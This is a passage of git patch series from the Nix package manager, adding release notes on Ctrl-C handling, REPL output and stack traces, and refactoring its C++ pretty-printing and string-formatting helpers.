indefinitely if Ctrl-C was pressed +while performing various operations (including `nix develop`, `nix flake +update`, and so on). With several fixes to Nix's signal handlers, Nix commands +will now exit quickly after Ctrl-C is pressed. + +This was actually released in Nix 2.20, but wasn't added to the release notes +so we're announcing it here. The historical release notes have been updated as well. diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 666d0b4db..8ede168a4 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -190,3 +190,13 @@ repository where the `flake.lock` file is `.gitignore`d [#8854](https://github.com/NixOS/nix/issues/8854) [#9324](https://github.com/NixOS/nix/pull/9324) + +- Nix commands will now respect Ctrl-C + [#7145](https://github.com/NixOS/nix/issues/7145) + [#6995](https://github.com/NixOS/nix/pull/6995) + [#9687](https://github.com/NixOS/nix/pull/9687) + + Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed + while performing various operations (including `nix develop`, `nix flake + update`, and so on). With several fixes to Nix's signal handlers, Nix + commands will now exit quickly after Ctrl-C is pressed. 
From 4f0d43a397205c185eea81e553e30fefc2c0d9f5 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:34:28 -0800 Subject: [PATCH 418/654] Add release notes for "`nix repl` now respects Ctrl-C while printing values" --- doc/manual/rl-next/repl-ctrl-c-while-printing.md | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 doc/manual/rl-next/repl-ctrl-c-while-printing.md diff --git a/doc/manual/rl-next/repl-ctrl-c-while-printing.md b/doc/manual/rl-next/repl-ctrl-c-while-printing.md new file mode 100644 index 000000000..15b0daa0a --- /dev/null +++ b/doc/manual/rl-next/repl-ctrl-c-while-printing.md @@ -0,0 +1,8 @@ +--- +synopsis: "`nix repl` now respects Ctrl-C while printing values" +prs: 9927 +--- + +`nix repl` will now halt immediately when Ctrl-C is pressed while it's printing +a value. This is useful if you got curious about what would happen if you +printed all of Nixpkgs. From 837c350bcd36f51d656fdb3bf1c40bce398181b0 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:34:46 -0800 Subject: [PATCH 419/654] Add release notes for "Cycle detection in `nix repl` is simpler and more reliable" --- doc/manual/rl-next/repl-cycle-detection.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 doc/manual/rl-next/repl-cycle-detection.md diff --git a/doc/manual/rl-next/repl-cycle-detection.md b/doc/manual/rl-next/repl-cycle-detection.md new file mode 100644 index 000000000..de24c4be1 --- /dev/null +++ b/doc/manual/rl-next/repl-cycle-detection.md @@ -0,0 +1,22 @@ +--- +synopsis: Cycle detection in `nix repl` is simpler and more reliable +prs: 9926 +issues: 8672 +--- + +The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere +else values are printed is now simpler and matches the cycle detection in +`nix-instantiate --eval` output. 
+ +Before: + +``` +nix eval --expr 'let self = { inherit self; }; in self' +{ self = { self = «repeated»; }; } +``` + +After: + +``` +{ self = «repeated»; } +``` From 7f8960d0f29991d6df8320059378d67530b45c50 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:35:06 -0800 Subject: [PATCH 420/654] Add release notes for "Stack size is increased on macOS" --- doc/manual/rl-next/stack-size-macos.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 doc/manual/rl-next/stack-size-macos.md diff --git a/doc/manual/rl-next/stack-size-macos.md b/doc/manual/rl-next/stack-size-macos.md new file mode 100644 index 000000000..b1c40bb5a --- /dev/null +++ b/doc/manual/rl-next/stack-size-macos.md @@ -0,0 +1,9 @@ +--- +synopsis: Stack size is increased on macOS +prs: 9860 +--- + +Previously, Nix would set the stack size to 64MiB on Linux, but would leave the +stack size set to the default (approximately 8KiB) on macOS. Now, the stack +size is correctly set to 64MiB on macOS as well, which should reduce stack +overflow segfaults in deeply-recursive Nix expressions. From b2868acbdc125bf3638f21dd8c5684cc56d4b739 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:35:21 -0800 Subject: [PATCH 421/654] Add release notes for "Stack traces are more compact" --- .../rl-next/stack-traces-are-more-compact.md | 51 +++++++++++++++++++ doc/manual/src/release-notes/rl-2.20.md | 19 +++++++ 2 files changed, 70 insertions(+) create mode 100644 doc/manual/rl-next/stack-traces-are-more-compact.md diff --git a/doc/manual/rl-next/stack-traces-are-more-compact.md b/doc/manual/rl-next/stack-traces-are-more-compact.md new file mode 100644 index 000000000..751465da1 --- /dev/null +++ b/doc/manual/rl-next/stack-traces-are-more-compact.md @@ -0,0 +1,51 @@ +--- +synopsis: Stack traces are more compact +prs: 9619 +--- + +Stack traces printed with `--show-trace` are more compact. 
+ +Before: + +``` +error: + … while evaluating the attribute 'body' + + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: + + 3| + 4| body = x "x"; + | ^ + 5| } + + error: assertion '(arg == "y")' failed + + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: + + 1| let { + 2| x = arg: assert arg == "y"; 123; + | ^ + 3| +``` + +After: + +``` +error: + … while evaluating the attribute 'body' + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: + 3| + 4| body = x "x"; + | ^ + 5| } + + error: assertion '(arg == "y")' failed + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: + 1| let { + 2| x = arg: assert arg == "y"; 123; + | ^ + 3| +``` + +This was actually released in Nix 2.20, but wasn't added to the release notes +so we're announcing it here. The historical release notes have been updated as well. diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 8ede168a4..4dd49c5ea 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -200,3 +200,22 @@ while performing various operations (including `nix develop`, `nix flake update`, and so on). With several fixes to Nix's signal handlers, Nix commands will now exit quickly after Ctrl-C is pressed. 
+ +- Blank lines have been removed from stack traces, rendering them more compact [#9619](https://github.com/NixOS/nix/pull/9619) + + ``` + error: + … while evaluating the attribute 'body' + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: + 3| + 4| body = x "x"; + | ^ + 5| } + + error: assertion '(arg == "y")' failed + at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: + 1| let { + 2| x = arg: assert arg == "y"; 123; + | ^ + 3| + ``` From 0f1269243b242be033ff031ab1993e05cf25d857 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 10:09:47 -0800 Subject: [PATCH 422/654] Revert "Add release notes for "Stack traces are more compact"" This reverts commit b2868acbdc125bf3638f21dd8c5684cc56d4b739. --- .../rl-next/stack-traces-are-more-compact.md | 51 ------------------- doc/manual/src/release-notes/rl-2.20.md | 19 ------- 2 files changed, 70 deletions(-) delete mode 100644 doc/manual/rl-next/stack-traces-are-more-compact.md diff --git a/doc/manual/rl-next/stack-traces-are-more-compact.md b/doc/manual/rl-next/stack-traces-are-more-compact.md deleted file mode 100644 index 751465da1..000000000 --- a/doc/manual/rl-next/stack-traces-are-more-compact.md +++ /dev/null @@ -1,51 +0,0 @@ ---- -synopsis: Stack traces are more compact -prs: 9619 ---- - -Stack traces printed with `--show-trace` are more compact. 
- -Before: - -``` -error: - … while evaluating the attribute 'body' - - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: - - 3| - 4| body = x "x"; - | ^ - 5| } - - error: assertion '(arg == "y")' failed - - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: - - 1| let { - 2| x = arg: assert arg == "y"; 123; - | ^ - 3| -``` - -After: - -``` -error: - … while evaluating the attribute 'body' - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: - 3| - 4| body = x "x"; - | ^ - 5| } - - error: assertion '(arg == "y")' failed - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: - 1| let { - 2| x = arg: assert arg == "y"; 123; - | ^ - 3| -``` - -This was actually released in Nix 2.20, but wasn't added to the release notes -so we're announcing it here. The historical release notes have been updated as well. diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 4dd49c5ea..8ede168a4 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -200,22 +200,3 @@ while performing various operations (including `nix develop`, `nix flake update`, and so on). With several fixes to Nix's signal handlers, Nix commands will now exit quickly after Ctrl-C is pressed. 
- -- Blank lines have been removed from stack traces, rendering them more compact [#9619](https://github.com/NixOS/nix/pull/9619) - - ``` - error: - … while evaluating the attribute 'body' - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:4:3: - 3| - 4| body = x "x"; - | ^ - 5| } - - error: assertion '(arg == "y")' failed - at /Users/wiggles/nix/tests/functional/lang/eval-fail-assert.nix:2:12: - 1| let { - 2| x = arg: assert arg == "y"; 123; - | ^ - 3| - ``` From a27651908fc1b5ef73a81e46434a408c5868fa7b Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 10:11:45 -0800 Subject: [PATCH 423/654] Add assertion for decreasing the indent MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com> --- src/libexpr/print.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 1ff026b3d..cdc9f6dbe 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -176,6 +176,7 @@ private: void decreaseIndent() { if (options.prettyPrint()) { + assert(indent.size() >= options.prettyIndent); indent.resize(indent.size() - options.prettyIndent); } } From 1c5f5d4291df7bf80806e57c75d2ec67bced8616 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 10:17:20 -0800 Subject: [PATCH 424/654] `prettyPrint` -> `shouldPrettyPrint` --- src/libexpr/print-options.hh | 2 +- src/libexpr/print.cc | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh index 94767df9c..6c5e80c61 100644 --- a/src/libexpr/print-options.hh +++ b/src/libexpr/print-options.hh @@ -71,7 +71,7 @@ struct PrintOptions /** * True if pretty-printing is enabled. 
*/ - inline bool prettyPrint() + inline bool shouldPrettyPrint() { return prettyIndent > 0; } diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index cdc9f6dbe..a8eac8288 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -168,14 +168,14 @@ private: void increaseIndent() { - if (options.prettyPrint()) { + if (options.shouldPrettyPrint()) { indent.append(options.prettyIndent, ' '); } } void decreaseIndent() { - if (options.prettyPrint()) { + if (options.shouldPrettyPrint()) { assert(indent.size() >= options.prettyIndent); indent.resize(indent.size() - options.prettyIndent); } @@ -279,7 +279,7 @@ private: bool shouldPrettyPrintAttrs(AttrVec & v) { - if (!options.prettyPrint() || v.empty()) { + if (!options.shouldPrettyPrint() || v.empty()) { return false; } @@ -356,7 +356,7 @@ private: bool shouldPrettyPrintList(std::span list) { - if (!options.prettyPrint() || list.empty()) { + if (!options.shouldPrettyPrint() || list.empty()) { return false; } From 403c90ddf58a3f16a44dfe1f20004b6baa4e5ce2 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 10:17:33 -0800 Subject: [PATCH 425/654] Extract `printSpace` helper --- src/libexpr/print.cc | 39 +++++++++++++++++++-------------------- 1 file changed, 19 insertions(+), 20 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index a8eac8288..5605aad28 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -181,6 +181,21 @@ private: } } + /** + * Print a space (for separating items or attributes). + * + * If pretty-printing is enabled, a newline and the current `indent` is + * printed instead. 
+ */ + void printSpace(bool prettyPrint) + { + if (prettyPrint) { + output << "\n" << indent; + } else { + output << " "; + } + } + void printRepeated() { if (options.ansiColors) @@ -324,11 +339,7 @@ private: auto prettyPrint = shouldPrettyPrintAttrs(sorted); for (auto & i : sorted) { - if (prettyPrint) { - output << "\n" << indent; - } else { - output << " "; - } + printSpace(prettyPrint); if (attrsPrinted >= options.maxAttrs) { printElided(sorted.size() - attrsPrinted, "attribute", "attributes"); @@ -343,11 +354,7 @@ private: } decreaseIndent(); - if (prettyPrint) { - output << "\n" << indent; - } else { - output << " "; - } + printSpace(prettyPrint); output << "}"; } else { output << "{ ... }"; @@ -389,11 +396,7 @@ private: auto listItems = v.listItems(); auto prettyPrint = shouldPrettyPrintList(listItems); for (auto elem : listItems) { - if (prettyPrint) { - output << "\n" << indent; - } else { - output << " "; - } + printSpace(prettyPrint); if (listItemsPrinted >= options.maxListItems) { printElided(listItems.size() - listItemsPrinted, "item", "items"); @@ -409,11 +412,7 @@ private: } decreaseIndent(); - if (prettyPrint) { - output << "\n" << indent; - } else { - output << " "; - } + printSpace(prettyPrint); output << "]"; } else { output << "[ ... ]"; From 149bd63afb30c5ae58eb3cc03fc208f89547cc16 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:16:30 -0800 Subject: [PATCH 426/654] Cleanup `fmt.hh` When I started contributing to Nix, I found the mix of definitions and names in `fmt.hh` to be rather confusing, especially the small difference between `hintfmt` and `hintformat`. I've renamed many classes and added documentation to most definitions. - `formatHelper` is no longer exported. - `fmt`'s documentation is now with `fmt` rather than (misleadingly) above `formatHelper`. - `yellowtxt` is renamed to `Magenta`. `yellowtxt` wraps its value with `ANSI_WARNING`, but `ANSI_WARNING` has been equal to `ANSI_MAGENTA` for a long time. 
Now the name is updated. - `normaltxt` is renamed to `Uncolored`. - `hintfmt` has been merged into `hintformat` as extra constructor functions. - `hintformat` has been renamed to `hintfmt`. - The single-argument `hintformat(std::string)` constructor has been renamed to a static member `hintformat::interpolate` to avoid pitfalls with using user-generated strings as format strings. --- src/build-remote/build-remote.cc | 2 +- src/libexpr/eval.hh | 2 +- src/libexpr/value/context.hh | 2 +- src/libstore/build/derivation-goal.cc | 8 +- src/libstore/build/local-derivation-goal.cc | 2 +- src/libstore/filetransfer.cc | 2 +- src/libstore/sqlite.cc | 6 +- src/libstore/sqlite.hh | 6 +- src/libutil/error.cc | 4 +- src/libutil/error.hh | 10 +- src/libutil/fmt.hh | 157 +++++++++++++------- src/libutil/logging.hh | 11 ++ tests/unit/libexpr/error_traces.cc | 1 - tests/unit/libutil/logging.cc | 2 +- 14 files changed, 135 insertions(+), 80 deletions(-) diff --git a/src/build-remote/build-remote.cc b/src/build-remote/build-remote.cc index 519e03242..94b672976 100644 --- a/src/build-remote/build-remote.cc +++ b/src/build-remote/build-remote.cc @@ -202,7 +202,7 @@ static int main_build_remote(int argc, char * * argv) else drvstr = ""; - auto error = hintformat(errorText); + auto error = hintfmt(errorText); error % drvstr % neededSystem diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 3c7c5da27..f72135527 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -148,7 +148,7 @@ struct DebugTrace { std::shared_ptr pos; const Expr & expr; const Env & env; - hintformat hint; + hintfmt hint; bool isError; }; diff --git a/src/libexpr/value/context.hh b/src/libexpr/value/context.hh index 51fd30a44..2abd1c9d4 100644 --- a/src/libexpr/value/context.hh +++ b/src/libexpr/value/context.hh @@ -20,7 +20,7 @@ public: { raw = raw_; auto hf = hintfmt(args...); - err.msg = hintfmt("Bad String Context element: %1%: %2%", normaltxt(hf.str()), raw); + err.msg = hintfmt("Bad String Context 
element: %1%: %2%", Uncolored(hf.str()), raw); } }; diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index 454c35763..d3bbdf1ed 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -708,7 +708,7 @@ void DerivationGoal::tryToBuild() if (!outputLocks.lockPaths(lockFiles, "", false)) { if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for lock on %s", magentatxt(showPaths(lockFiles)))); + fmt("waiting for lock on %s", Magenta(showPaths(lockFiles)))); worker.waitForAWhile(shared_from_this()); return; } @@ -762,7 +762,7 @@ void DerivationGoal::tryToBuild() the wake-up timeout expires. */ if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for a machine to build '%s'", magentatxt(worker.store.printStorePath(drvPath)))); + fmt("waiting for a machine to build '%s'", Magenta(worker.store.printStorePath(drvPath)))); worker.waitForAWhile(shared_from_this()); outputLocks.unlock(); return; @@ -987,7 +987,7 @@ void DerivationGoal::buildDone() diskFull |= cleanupDecideWhetherDiskFull(); auto msg = fmt("builder for '%s' %s", - magentatxt(worker.store.printStorePath(drvPath)), + Magenta(worker.store.printStorePath(drvPath)), statusToString(status)); if (!logger->isVerbose() && !logTail.empty()) { @@ -1523,7 +1523,7 @@ void DerivationGoal::done( outputLocks.unlock(); buildResult.status = status; if (ex) - buildResult.errorMsg = fmt("%s", normaltxt(ex->info().msg)); + buildResult.errorMsg = fmt("%s", Uncolored(ex->info().msg)); if (buildResult.status == BuildResult::TimedOut) worker.timedOut = true; if (buildResult.status == BuildResult::PermanentFailure) diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index ce8943efe..a2f411b8a 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -232,7 +232,7 @@ void 
LocalDerivationGoal::tryLocalBuild() if (!buildUser) { if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for a free build user ID for '%s'", magentatxt(worker.store.printStorePath(drvPath)))); + fmt("waiting for a free build user ID for '%s'", Magenta(worker.store.printStorePath(drvPath)))); worker.waitForAWhile(shared_from_this()); return; } diff --git a/src/libstore/filetransfer.cc b/src/libstore/filetransfer.cc index dcbec4acd..eb39be158 100644 --- a/src/libstore/filetransfer.cc +++ b/src/libstore/filetransfer.cc @@ -887,7 +887,7 @@ FileTransferError::FileTransferError(FileTransfer::Error error, std::optionalsize() < 1024 || response->find("") != std::string::npos)) - err.msg = hintfmt("%1%\n\nresponse body:\n\n%2%", normaltxt(hf.str()), chomp(*response)); + err.msg = hintfmt("%1%\n\nresponse body:\n\n%2%", Uncolored(hf.str()), chomp(*response)); else err.msg = hf; } diff --git a/src/libstore/sqlite.cc b/src/libstore/sqlite.cc index d7432a305..ff14ec420 100644 --- a/src/libstore/sqlite.cc +++ b/src/libstore/sqlite.cc @@ -10,19 +10,19 @@ namespace nix { -SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintformat && hf) +SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintfmt && hf) : Error(""), path(path), errMsg(errMsg), errNo(errNo), extendedErrNo(extendedErrNo), offset(offset) { auto offsetStr = (offset == -1) ? "" : "at offset " + std::to_string(offset) + ": "; err.msg = hintfmt("%s: %s%s, %s (in '%s')", - normaltxt(hf.str()), + Uncolored(hf.str()), offsetStr, sqlite3_errstr(extendedErrNo), errMsg, path ? 
path : "(in-memory)"); } -[[noreturn]] void SQLiteError::throw_(sqlite3 * db, hintformat && hf) +[[noreturn]] void SQLiteError::throw_(sqlite3 * db, hintfmt && hf) { int err = sqlite3_errcode(db); int exterr = sqlite3_extended_errcode(db); diff --git a/src/libstore/sqlite.hh b/src/libstore/sqlite.hh index 0c08267f7..33ebb5892 100644 --- a/src/libstore/sqlite.hh +++ b/src/libstore/sqlite.hh @@ -145,16 +145,16 @@ struct SQLiteError : Error throw_(db, hintfmt(fs, args...)); } - SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintformat && hf); + SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintfmt && hf); protected: template SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, const std::string & fs, const Args & ... args) - : SQLiteError(path, errNo, extendedErrNo, offset, hintfmt(fs, args...)) + : SQLiteError(path, errMsg, errNo, extendedErrNo, offset, hintfmt(fs, args...)) { } - [[noreturn]] static void throw_(sqlite3 * db, hintformat && hf); + [[noreturn]] static void throw_(sqlite3 * db, hintfmt && hf); }; diff --git a/src/libutil/error.cc b/src/libutil/error.cc index e4e50d73b..e3b30b3a1 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -11,7 +11,7 @@ namespace nix { -void BaseError::addTrace(std::shared_ptr && e, hintformat hint, bool frame) +void BaseError::addTrace(std::shared_ptr && e, hintfmt hint, bool frame) { err.traces.push_front(Trace { .pos = std::move(e), .hint = hint, .frame = frame }); } @@ -37,7 +37,7 @@ const std::string & BaseError::calcWhat() const std::optional ErrorInfo::programName = std::nullopt; -std::ostream & operator <<(std::ostream & os, const hintformat & hf) +std::ostream & operator <<(std::ostream & os, const hintfmt & hf) { return os << hf.str(); } diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 4fb822843..966f4d770 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh 
@@ -63,7 +63,7 @@ void printCodeLines(std::ostream & out, struct Trace { std::shared_ptr pos; - hintformat hint; + hintfmt hint; bool frame; }; @@ -74,7 +74,7 @@ inline bool operator>=(const Trace& lhs, const Trace& rhs); struct ErrorInfo { Verbosity level; - hintformat msg; + hintfmt msg; std::shared_ptr pos; std::list traces; @@ -126,7 +126,7 @@ public: : err { .level = lvlError, .msg = hintfmt(args...), .suggestions = sug } { } - BaseError(hintformat hint) + BaseError(hintfmt hint) : err { .level = lvlError, .msg = hint } { } @@ -162,7 +162,7 @@ public: addTrace(std::move(e), hintfmt(std::string(fs), args...)); } - void addTrace(std::shared_ptr && e, hintformat hint, bool frame = false); + void addTrace(std::shared_ptr && e, hintfmt hint, bool frame = false); bool hasTrace() const { return !err.traces.empty(); } @@ -215,7 +215,7 @@ public: : SystemError(""), errNo(errNo) { auto hf = hintfmt(args...); - err.msg = hintfmt("%1%: %2%", normaltxt(hf.str()), strerror(errNo)); + err.msg = hintfmt("%1%: %2%", Uncolored(hf.str()), strerror(errNo)); } /** diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh index 6430c7707..9c2cc1e85 100644 --- a/src/libutil/fmt.hh +++ b/src/libutil/fmt.hh @@ -8,37 +8,53 @@ namespace nix { - +namespace { /** - * Inherit some names from other namespaces for convenience. - */ -using boost::format; - - -/** - * A variadic template that does nothing. Useful to call a function - * for all variadic arguments but ignoring the result. - */ -struct nop { template nop(T...) {} }; - - -/** - * A helper for formatting strings. ‘fmt(format, a_0, ..., a_n)’ is - * equivalent to ‘boost::format(format) % a_0 % ... % - * ... a_n’. However, ‘fmt(s)’ is equivalent to ‘s’ (so no %-expansion - * takes place). + * A helper for writing `boost::format` expressions. + * + * These are equivalent: + * + * ``` + * formatHelper(formatter, a_0, ..., a_n) + * formatter % a_0 % ... % a_n + * ``` + * + * With a single argument, `formatHelper(s)` is a no-op. 
*/ template inline void formatHelper(F & f) -{ -} +{ } template inline void formatHelper(F & f, const T & x, const Args & ... args) { + // Interpolate one argument and then recurse. formatHelper(f % x, args...); } +} +/** + * A helper for writing a `boost::format` expression to a string. + * + * These are (roughly) equivalent: + * + * ``` + * fmt(formatString, a_0, ..., a_n) + * (boost::format(formatString) % a_0 % ... % a_n).str() + * ``` + * + * However, when called with a single argument, the string is returned + * unchanged. + * + * If you write code like this: + * + * ``` + * std::cout << boost::format(stringFromUserInput) << std::endl; + * ``` + * + * And `stringFromUserInput` contains formatting placeholders like `%s`, then + * the code will crash at runtime. `fmt` helps you avoid this pitfall. + */ inline std::string fmt(const std::string & s) { return s; @@ -63,61 +79,107 @@ inline std::string fmt(const std::string & fs, const Args & ... args) return f.str(); } -// format function for hints in errors. same as fmt, except templated values -// are always in magenta. +/** + * Values wrapped in this struct are printed in magenta. + * + * By default, arguments to `hintfmt` are printed in magenta. To avoid this, + * either wrap the argument in `Uncolored` or add a specialization of + * `hintfmt::operator%`. + */ template -struct magentatxt +struct Magenta { - magentatxt(const T &s) : value(s) {} + Magenta(const T &s) : value(s) {} const T & value; }; template -std::ostream & operator<<(std::ostream & out, const magentatxt & y) +std::ostream & operator<<(std::ostream & out, const Magenta & y) { return out << ANSI_WARNING << y.value << ANSI_NORMAL; } +/** + * Values wrapped in this class are printed without coloring. + * + * By default, arguments to `hintfmt` are printed in magenta (see `Magenta`). 
+ */ template -struct normaltxt +struct Uncolored { - normaltxt(const T & s) : value(s) {} + Uncolored(const T & s) : value(s) {} const T & value; }; template -std::ostream & operator<<(std::ostream & out, const normaltxt & y) +std::ostream & operator<<(std::ostream & out, const Uncolored & y) { return out << ANSI_NORMAL << y.value; } -class hintformat +/** + * A wrapper around `boost::format` which colors interpolated arguments in + * magenta by default. + */ +class hintfmt { +private: + boost::format fmt; + public: - hintformat(const std::string & format) : fmt(format) + /** + * Construct a `hintfmt` from a format string, with values to be + * interpolated later with `%`. + * + * This isn't exposed as a single-argument constructor to avoid + * accidentally constructing `hintfmt`s with user-controlled strings. See + * the note on `fmt` for more information. + */ + static hintfmt interpolate(const std::string & formatString) { - fmt.exceptions(boost::io::all_error_bits ^ - boost::io::too_many_args_bit ^ - boost::io::too_few_args_bit); + hintfmt result((boost::format(formatString))); + result.fmt.exceptions( + boost::io::all_error_bits ^ + boost::io::too_many_args_bit ^ + boost::io::too_few_args_bit); + return result; } - hintformat(const hintformat & hf) + /** + * Format the given string literally, without interpolating format + * placeholders. + */ + hintfmt(const std::string & literal) + : hintfmt("%s", Uncolored(literal)) + { } + + /** + * Interpolate the given arguments into the format string. + */ + template + hintfmt(const std::string & format, const Args & ... 
args) + : fmt(format) + { + formatHelper(*this, args...); + } + + hintfmt(const hintfmt & hf) : fmt(hf.fmt) { } - hintformat(format && fmt) + hintfmt(boost::format && fmt) : fmt(std::move(fmt)) { } template - hintformat & operator%(const T & value) + hintfmt & operator%(const T & value) { - fmt % magentatxt(value); + fmt % Magenta(value); return *this; } template - hintformat & operator%(const normaltxt & value) + hintfmt & operator%(const Uncolored & value) { fmt % value.value; return *this; @@ -127,25 +189,8 @@ public: { return fmt.str(); } - -private: - format fmt; }; -std::ostream & operator<<(std::ostream & os, const hintformat & hf); - -template -inline hintformat hintfmt(const std::string & fs, const Args & ... args) -{ - hintformat f(fs); - formatHelper(f, args...); - return f; -} - -inline hintformat hintfmt(const std::string & plain_string) -{ - // we won't be receiving any args in this case, so just print the original string - return hintfmt("%s", normaltxt(plain_string)); -} +std::ostream & operator<<(std::ostream & os, const hintfmt & hf); } diff --git a/src/libutil/logging.hh b/src/libutil/logging.hh index 183f2d8e1..9e81132e3 100644 --- a/src/libutil/logging.hh +++ b/src/libutil/logging.hh @@ -120,6 +120,17 @@ public: { } }; +/** + * A variadic template that does nothing. + * + * Useful to call a function with each argument in a parameter pack. + */ +struct nop +{ + template nop(T...) 
+ { } +}; + ActivityId getCurActivity(); void setCurActivity(const ActivityId activityId); diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 8e8726195..3cfa2b61b 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -53,7 +53,6 @@ namespace nix { state.error("beans").debugThrow(); } catch (Error & e2) { e.addTrace(state.positions[noPos], "beans2", ""); - //e2.addTrace(state.positions[noPos], "Something", ""); ASSERT_TRUE(e.info().traces.size() == 2); ASSERT_TRUE(e2.info().traces.size() == 0); ASSERT_FALSE(&e.info() == &e2.info()); diff --git a/tests/unit/libutil/logging.cc b/tests/unit/libutil/logging.cc index 8950a26d4..c8c7c091f 100644 --- a/tests/unit/libutil/logging.cc +++ b/tests/unit/libutil/logging.cc @@ -62,7 +62,7 @@ namespace nix { throw TestError(e.info()); } catch (Error &e) { ErrorInfo ei = e.info(); - ei.msg = hintfmt("%s; subsequent error message.", normaltxt(e.info().msg.str())); + ei.msg = hintfmt("%s; subsequent error message.", Uncolored(e.info().msg.str())); testing::internal::CaptureStderr(); logger->logEI(ei); From c0e7f50c1a46693d06fab8a36526a4beaa702389 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 20:35:19 -0800 Subject: [PATCH 427/654] Rename `hintfmt` to `HintFmt` --- src/build-remote/build-remote.cc | 2 +- src/libexpr/eval-error.cc | 10 +- src/libexpr/eval-error.hh | 2 +- src/libexpr/eval.cc | 8 +- src/libexpr/eval.hh | 2 +- src/libexpr/flake/flake.cc | 4 +- src/libexpr/lexer.l | 6 +- src/libexpr/parser-state.hh | 8 +- src/libexpr/parser.y | 8 +- src/libexpr/primops.cc | 10 +- src/libexpr/primops/fetchClosure.cc | 22 +- src/libexpr/print.cc | 2 +- src/libexpr/print.hh | 2 +- src/libexpr/value-to-json.cc | 4 +- src/libexpr/value/context.hh | 4 +- src/libstore/build/local-derivation-goal.cc | 2 +- src/libstore/filetransfer.cc | 4 +- src/libstore/sqlite.cc | 10 +- src/libstore/sqlite.hh | 8 +- src/libutil/current-process.cc | 2 +- 
